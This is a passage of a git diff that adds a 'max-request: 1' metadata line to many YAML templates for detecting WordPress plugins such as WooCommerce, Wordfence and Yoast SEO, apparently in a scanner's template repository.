     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 7c13b8d2a4..4a29cecdb0 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
+    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index 53b30ba721..be281d91e6 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
+    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 9555d7aebd..6bd95ec077 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
+    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 180266f448..1fd64a5279 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
+    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 17584cd064..1bb9a283ce 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
+    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 015fb97043..7836d9554c 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
+    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index 1d5224b457..ccd72e427a 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index aafd6c6a38..3622b2c6b3 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
+    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index e10ab985da..9eff765d61 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
+    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index 9881b591ae..c856e1fa9e 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
+    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 0480b4b0e6..008440cc58 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
+    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 26d525386b..410776862f 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
+    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index 3920c5cf56..f210a2a2f9 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
+    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f556786f5a..f1dd1bf150 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
+    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index 844e3d19a0..a9ec913599 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
+    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index eb0f02f602..d38aeb0279 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
+    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 755efd53fa..07c43b9d80 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
+    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 0403bb4e72..83a849e11e 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
+    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index cd2632ea05..c6100637d9 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
+    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index b5f8b822c7..1f188b66c6 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
+    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 85aaf7ff16..2c7b16cb44 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
+    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 0af322b728..9d6afa8d3f 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index d4ac0d179e..87721a245a 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
+    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index dbbadf3cfc..45e0dead0e 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
+    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index 401b0e479f..abec174ec3 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
+    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index 6f95506748..e088ac07a6 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
+    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 4404f87aab..8b163200bf 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
+    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 8995434fce..2366a7dad7 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
+    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 8175806cb8..71448e61e8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
+    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index db82bc7f43..717554b89f 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
+    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index 03ddae57bc..fba5c8b09c 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
+    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index d6449bb5bf..631202198e 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
+    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index 2d5fdf1779..cc953078eb 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
+    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 6b5705e20d..97ce674116 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
+    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index dbcdb64bad..6d05a6f058 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index fb9ea502ce..baf5af3bb5 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 48ffb25245..aa1898c4ba 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 4fa6fc3ffe..5fae796fdd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 1c1c690fcd..22f812e2b8 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index 4d6702d81a..c637006d26 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index 42cb8bc409..e020507ccb 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index 55d6effbf5..c92903fd79 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
+    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index 6786cab703..c25b2c1c48 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 784ba22c8a..4d6dd14d25 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 72ff55e58a..7ca0870ed6 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
+    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 8cfaa0f5a9..4f0d9be568 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index 85900a01a7..f3c481b824 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
+    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index a7ccde0b49..ba214fd7ea 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
+    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 422664a98c..8f5fe8d9a5 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index f0af3a748a..0458b13354 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
+    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index f89f1a20b3..d570be07bf 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
+    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index 01fb12d0ad..ee05e3add8 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
+    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
